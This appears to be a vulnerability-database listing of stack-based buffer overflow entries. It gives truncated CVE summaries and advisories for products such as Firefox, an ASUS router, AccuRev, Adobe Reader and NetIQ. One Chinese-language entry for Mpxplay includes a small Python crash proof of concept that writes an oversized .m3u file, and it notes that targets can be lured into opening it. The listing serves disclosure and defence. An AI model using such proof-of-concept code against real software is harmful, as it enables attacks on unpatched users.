Stack overflow

The AnimationThread function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 uses an incorrect argument to the sscanf function, which might allow remote attackers to cause a denial of service stack-based buffer overflow and application crash or possibly have unspecified other impa...

CVE-2015-7176

Mozilla Firefox CVE-2015-7176 affects Firefox before 41.0 (ESR 38.x before 38.3). Root cause: AnimationThread uses an incorrect argument to sscanf, enabling a remote attacker to trigger a stack-based buffer overflow and crash, with possible other impact via unknown vectors. Public details describ...

CVE-2015-7176

The AnimationThread function in Mozilla Firefox before 41.0 and Firefox ESR 38.x before 38.3 uses an incorrect argument to the sscanf function, which might allow remote attackers to cause a denial of service stack-based buffer overflow and application crash or possibly have unspecified other impa...

CVE-2015-6949

Stack-based buffer overflow in the ASUS TM-AC1900 router allows remote attackers to execute arbitrary code via crafted HTTP header values...

CVE-2015-6946

CVE-2015-6946 (Borland AccuRev Reprise License Manager) involves multiple stack-based buffer overflows in the service where remote attackers can execute arbitrary code via the activate_doit (akey, actserver) or service_startup_doit (licfile) parameters. Connected advisories (ZDI) describe stack o...

CVE-2015-6946

Multiple stack-based buffer overflows in the Reprise License Manager service in Borland AccuRev allow remote attackers to execute arbitrary code via the 1 akey or 2 actserver parameter to the activatedoit function or 3 licfile parameter to the servicestartupdoit functionality...

Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow

使用如下python代码生成一个可以触发漏洞的m3u文件，调试环境为win7，由于存在ASLR，所以每次需要将改变的地址高4位加偏移计算真正地址。此漏洞依然是由于没有对长度进行检查的逻辑错误导致的本地溢出，可以构造畸形文件诱使目标点击后执行任意代码。 junk = "A"66666 file = open"CRASH.m3u",'w' file.writejunk file.close 生成后打开mmc，触发这个漏洞，程序中断 0:009 t 20ec.26d0: Access violation - code c0000005 first chance First chance...

CVE-2014-9208

Multiple stack-based buffer overflows in unspecified DLL files in Advantech WebAccess before 8.0.1 allow remote attackers to execute arbitrary code via unknown vectors...

Amazon Linux: Security Advisory (ALAS-2014-300)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Amazon Linux: Security Advisory (ALAS-2012-144)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Amazon Linux: Security Advisory (ALAS-2014-282)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Yahoo! Messenger 11.5.0.228 Buffer Overflow

ADVISORY INFORMATION-----------------------Product: Yahoo! MessengerVendor URL: www.yahoo.comType: Stack-based Buffer Overflow CWE-121Date found: 2014-05-02Date published: 2015-09-03CVSSv3 Score: 4,8 AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:LCVE: CVE-2014-7216 VERSIONS AFFECTED--------------------Yahoo!...

HP LoadRunner < 12.50 Scenario File Local Code Execution

The version of HP LoadRunner installed on the remote host is prior to 12.50. It is, therefore, affected by a local code execution vulnerability due to an overflow condition that is triggered when handling scenario files .lrs. A local attacker can exploit this, via a specially crafted scenario fil...

CVE-2015-1171

CVE-2015-1171 affects GSM SIM Utility (aka SIM Card Editor) 6.6. The flaw is a stack-based buffer overflow triggered by a long entry in a .sms file, enabling remote code execution. Public materials in the Connected documents include an in-depth exploit description and sample exploit code (e.g., E...

ZSNES 1.51 - Local Buffer Overflow

ZSNES 1.51 - Local Buffer Overflow Exploit Author: Juan Sacco - http://www.exploitpack.comp Tested on: GNU/Linux - Kali Linux 2.0 Description: ZSNES v1.51 and prior is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on...

Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow Exploit

Microsoft Office 2007 suffers from a stack-based buffer overflow vulnerability when handling a malformed document. Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1 The following access violation was observed in Microsoft Office 2007 Word document: e24.e28:...

IBM Tivoli Storage Manager FastBack 6.1.x < 6.1.12.1 Multiple Vulnerabilities

The version of IBM Tivoli Storage Manager FastBack running on the remote host is 6.1.x prior to 6.1.12.1. It is, therefore, affected by multiple stack-based buffer overflow conditions that can be exploited by a remote attacker, using specially crafted packets, to cause a denial of service or...

CVE-2015-0795

Multiple stack-based buffer overflows in the SafeShellExecute method in the NetIQExecObject.NetIQExec.1 ActiveX control in NetIQExec.dll in NetIQ Security Solutions for iSeries 8.1 allow remote attackers to execute arbitrary code via long arguments, aka ZDI-CAN-2699...

CVE-2015-0795

CVE-2015-0795 affects NetIQ Security Solutions for ISeries. The NetIQExecObject.NetIQExec.1 ActiveX Control’s SafeShellExecute method in NetIQExec.dll contains a stack-based buffer overflow when processing long parameters, enabling remote code execution in affected installations of version 8.1. T...

CVE-2015-5110

CVE-2015-5110 is a stack-based buffer overflow in Adobe Reader/Acrobat affecting 10.x before 10.1.15 and 11.x before 11.0.12, plus Acrobat/Reader DC Classic before 2015.006.30060 and DC Continuous before 2015.008.20082 on Windows and OS X. The root cause is a stack/boundary overflow in the affect...